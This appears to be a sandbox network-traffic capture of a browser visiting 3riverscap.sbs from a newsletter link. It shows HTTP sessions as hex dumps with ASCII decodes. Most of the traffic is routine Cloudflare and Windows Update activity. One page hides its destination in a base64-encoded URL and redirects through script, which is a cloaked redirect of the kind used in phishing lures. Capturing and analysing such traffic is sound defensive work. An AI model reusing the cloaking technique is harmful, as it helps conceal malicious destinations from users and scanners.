                                                                              2024-11-26 19:54:32 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 37 35 26 6d 69 6e 5f 72 74 74 3d 31 36 37 31 26 72 74 74 5f 76 61 72 3d 36 33 35 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 32 30 32 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 31 31 36 30 36 26 63 77 6e 64 3d 31 34 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 38 64 34 63 37 36 32 32 33 65 32 66 31 61 61 26 74 73 3d 36 38 36 26 78 3d 30 22 0d 0a 0d 0a
                                                                              Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1671&rtt_var=635&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2028&delivery_rate=1711606&cwnd=146&unsent_bytes=0&cid=58d4c76223e2f1aa&ts=686&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1649717162.159.140.1604436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:31 UTC784OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8
                                                                              2024-11-26 19:54:32 UTC917INHTTP/1.1 302 Found
                                                                              Date: Tue, 26 Nov 2024 19:54:32 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js?
                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                              access-control-allow-origin: *
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ixWFuOIAM2Xxbud1SxIN7dQycgPPfAcAN9bgr5mNuBB5rQZndyIf6W4OLHS5gJEmol%2BCbwRkC%2BVbgQyohfUwuBpoh%2BptsV7w0vyLoZh1bZJpndwBcuMWvpQcbXHPpp%2FXBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e4ead2d8c71-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1757&rtt_var=702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1362&delivery_rate=1512169&cwnd=193&unsent_bytes=0&cid=088ed859f3f74ba7&ts=490&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.16497182.18.84.141443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:32 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                              Range: bytes=0-2147483646
                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: fs.microsoft.com
                                                                              2024-11-26 19:54:32 UTC515INHTTP/1.1 200 OK
                                                                              ApiVersion: Distribute 1.1
                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                              Content-Type: application/octet-stream
                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                              Server: ECAcc (lpl/EF06)
                                                                              X-CID: 11
                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                              X-Ms-Region: prod-weu-z1
                                                                              Cache-Control: public, max-age=196010
                                                                              Date: Tue, 26 Nov 2024 19:54:32 GMT
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              X-CID: 2
                                                                              2024-11-26 19:54:32 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.164972035.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:33 UTC478OUTPOST /report/v4?s=3lhmd%2F40r6kamzJDBBPOlGe9MkjbmYpNXHlgjtGyM395U2bldkADhRdbF5JNgSKY3VR0kY2UjP7AQpddk6%2F3FhbvcUl33WQVNKEn7r7NgnlA2qmwj6IiPBgPnPzm2IYJcg%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 532
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:33 UTC532OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 32 37 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 36 32 2e 31 35 39 2e 31 34 30 2e 31 36 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 33 72 69 76 65 72 73 63 61 70 2e 73 62
                                                                              Data Ascii: [{"age":1,"body":{"elapsed_time":2270,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"162.159.140.160","status_code":503,"type":"http.error"},"type":"network-error","url":"https://3riverscap.sb
                                                                              2024-11-26 19:54:33 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Tue, 26 Nov 2024 19:54:33 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.16497194.245.163.56443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:33 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=s8KFDPC2G8SYPmy&MD=l5dLo5zL HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-11-26 19:54:34 UTC560INHTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                              MS-CorrelationId: 0da5f330-ea1a-419e-8980-8187fa4c0ff1
                                                                              MS-RequestId: b3a676e0-9fc1-4d45-b562-5d99c50068d2
                                                                              MS-CV: D81Upi+AvkeASRa/.0
                                                                              X-Microsoft-SLSClientCache: 2880
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Tue, 26 Nov 2024 19:54:33 GMT
                                                                              Connection: close
                                                                              Content-Length: 24490
                                                                              2024-11-26 19:54:34 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                              2024-11-26 19:54:34 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.1649721162.159.140.1604436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:33 UTC1364OUTGET /?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425 HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54
                                                                              2024-11-26 19:54:34 UTC955INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:34 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Last-Modified: Tue, 26 Nov 2024 19:02:41 GMT
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUrvO3%2Fli2WCNDFnb7sy0G%2FBcETy%2FpaZgLImtIDUiTxrRKs1QXrV467tga%2FHU8risXaO%2Fvwhr7lta2Ehsvy2chmZrbmX0DET9BZxI3f05eqkvh7TL3ECWCXnJOwRDMB40g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e58cb1b43b2-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1556&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1964&delivery_rate=1806930&cwnd=236&unsent_bytes=0&cid=53fd158ed8026547&ts=751&x=0"
                                                                              2024-11-26 19:54:34 UTC414INData Raw: 35 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 0d 0a 20 20 20 20 63 6f 6e 73 74 20 62 61 73 65 36 34 45 6e 63 6f 64 65 64 55 52 4c 20 3d 20 27 61 48 52 30 63
                                                                              Data Ascii: 5d9<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirecting...</title> <script type="text/javascript"> const base64EncodedURL = 'aHR0c
                                                                              2024-11-26 19:54:34 UTC1090INData Raw: 36 34 45 6e 63 6f 64 65 64 55 52 4c 29 3b 0d 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 65 63 6f 64 65 64 55 52 4c 3b 0d 0a 20 20 20 20 7d 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 3c 70 3e 52 65 64 69 72 65 63 74 69 6e 67 2c 20 70 6c 65 61 73 65 20 77 61 69 74 2e 2e 2e 3c 2f 70 3e 0d 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b
                                                                              Data Ascii: 64EncodedURL); window.location.href = decodedURL; }; </script></head><body> <p>Redirecting, please wait...</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');
                                                                              2024-11-26 19:54:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.1649722162.159.140.1604436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:33 UTC802OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js? HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8
                                                                              2024-11-26 19:54:34 UTC898INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:33 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 8758
                                                                              Connection: close
                                                                              cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                              x-content-type-options: nosniff
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q6HBF0Kr1p94a3amJ2c2iDHrl9ooqXp1MKUqVZzntlFgu1%2BQHU35ND3nkEeUi3U79cR3EKt8nkmchrpwLU5v2SXC9%2FW31uO%2BJNoGcvP6YPXm9ReNFm%2FBZnZlb%2FMJGXdiCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e5a6c660c94-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1645&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1380&delivery_rate=1742243&cwnd=146&unsent_bytes=0&cid=91bbf4f4c7ddff16&ts=464&x=0"
                                                                              2024-11-26 19:54:34 UTC471INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 58 2c 68 2c 69 2c 6e 2c 6f 2c 73 2c 7a 2c 41 2c 44 29 7b 58 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 57 2c 65 2c 66 29 7b 66 6f 72 28 57 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 57 28 35 33 38 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 57 28 35 30 38 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 57 28 34 37 36 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 57 28 35 34 38 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 57 28 35 32 31 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 57 28 34 39 36 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 57 28 35 32 33 29 29 2f 37 2b 70 61 72
                                                                              Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,n,o,s,z,A,D){X=b,function(c,d,W,e,f){for(W=b,e=c();!![];)try{if(f=parseInt(W(538))/1+parseInt(W(508))/2*(parseInt(W(476))/3)+-parseInt(W(548))/4+parseInt(W(521))/5*(-parseInt(W(496))/6)+parseInt(W(523))/7+par
                                                                              2024-11-26 19:54:34 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 46 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 46 3f 27 27 3a 65 2e 67 28 46 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 47 2c 61 36 29 7b 72 65 74 75 72 6e 20 61 36 3d 62 2c 61 36 28 34 33 38 29 5b 61 36 28 34 36 32 29 5d 28 47 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 46 2c 47 2c 48 2c 61 37 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 54 2c 55 2c 56 29 7b 69 66 28 61 37 3d 61 35 2c 6e 75 6c 6c 3d 3d 46 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 7b 7d 2c 4b 3d 7b 7d 2c 4c 3d 27 27 2c 4d 3d 32 2c 4e 3d 33 2c 4f 3d 32 2c 50 3d 5b 5d 2c 51 3d 30 2c 52 3d 30 2c 53 3d 30 3b 53 3c 46 5b 61 37 28 35 30 36 29 5d 3b 53 2b 3d 31 29 69 66 28 54 3d 46 5b 61 37 28 34 36 32 29 5d 28 53 29 2c 4f 62 6a 65 63 74
                                                                              Data Ascii: unction(F){return null==F?'':e.g(F,6,function(G,a6){return a6=b,a6(438)[a6(462)](G)})},'g':function(F,G,H,a7,I,J,K,L,M,N,O,P,Q,R,S,T,U,V){if(a7=a5,null==F)return'';for(J={},K={},L='',M=2,N=3,O=2,P=[],Q=0,R=0,S=0;S<F[a7(506)];S+=1)if(T=F[a7(462)](S),Object
                                                                              2024-11-26 19:54:34 UTC1369INData Raw: 2b 29 2c 64 65 6c 65 74 65 20 4b 5b 4c 5d 7d 65 6c 73 65 20 66 6f 72 28 56 3d 4a 5b 4c 5d 2c 49 3d 30 3b 49 3c 4f 3b 51 3d 31 26 56 7c 51 3c 3c 31 2e 34 35 2c 47 2d 31 3d 3d 52 3f 28 52 3d 30 2c 50 5b 61 37 28 35 30 31 29 5d 28 48 28 51 29 29 2c 51 3d 30 29 3a 52 2b 2b 2c 56 3e 3e 3d 31 2c 49 2b 2b 29 3b 4d 2d 2d 2c 4d 3d 3d 30 26 26 4f 2b 2b 7d 66 6f 72 28 56 3d 32 2c 49 3d 30 3b 49 3c 4f 3b 51 3d 51 3c 3c 31 7c 56 26 31 2e 36 34 2c 47 2d 31 3d 3d 52 3f 28 52 3d 30 2c 50 5b 61 37 28 35 30 31 29 5d 28 48 28 51 29 29 2c 51 3d 30 29 3a 52 2b 2b 2c 56 3e 3e 3d 31 2c 49 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 51 3c 3c 3d 31 2c 47 2d 31 3d 3d 52 29 7b 50 5b 61 37 28 35 30 31 29 5d 28 48 28 51 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 52 2b 2b 3b 72 65 74 75
                                                                              Data Ascii: +),delete K[L]}else for(V=J[L],I=0;I<O;Q=1&V|Q<<1.45,G-1==R?(R=0,P[a7(501)](H(Q)),Q=0):R++,V>>=1,I++);M--,M==0&&O++}for(V=2,I=0;I<O;Q=Q<<1|V&1.64,G-1==R?(R=0,P[a7(501)](H(Q)),Q=0):R++,V>>=1,I++);for(;;)if(Q<<=1,G-1==R){P[a7(501)](H(Q));break}else R++;retu
                                                                              2024-11-26 19:54:34 UTC1369INData Raw: 32 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 4d 5b 61 61 28 35 30 31 29 5d 28 56 29 2c 49 5b 4b 2b 2b 5d 3d 4e 2b 56 5b 61 61 28 34 36 32 29 5d 28 30 29 2c 4a 2d 2d 2c 4e 3d 56 2c 4a 3d 3d 30 26 26 28 4a 3d 4d 61 74 68 5b 61 61 28 34 35 39 29 5d 28 32 2c 4c 29 2c 4c 2b 2b 29 7d 7d 7d 2c 66 3d 7b 7d 2c 66 5b 61 35 28 34 35 30 29 5d 3d 65 2e 68 2c 66 7d 28 29 2c 6f 3d 7b 7d 2c 6f 5b 58 28 35 31 38 29 5d 3d 27 6f 27 2c 6f 5b 58 28 34 34 32 29 5d 3d 27 73 27 2c 6f 5b 58 28 34 35 33 29 5d 3d 27 75 27 2c 6f 5b 58 28 34 38 33 29 5d 3d 27 7a 27 2c 6f 5b 58 28 35 32 38 29 5d 3d 27 6e 27 2c 6f 5b 58 28 35 32 39 29 5d 3d 27 49 27 2c 6f 5b 58 28 35 31 32 29 5d 3d 27 62 27 2c 73 3d 6f 2c 68 5b 58 28 34 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e
                                                                              Data Ascii: 2)](0);else return null;M[aa(501)](V),I[K++]=N+V[aa(462)](0),J--,N=V,J==0&&(J=Math[aa(459)](2,L),L++)}}},f={},f[a5(450)]=e.h,f}(),o={},o[X(518)]='o',o[X(442)]='s',o[X(453)]='u',o[X(483)]='z',o[X(528)]='n',o[X(529)]='I',o[X(512)]='b',s=o,h[X(474)]=function
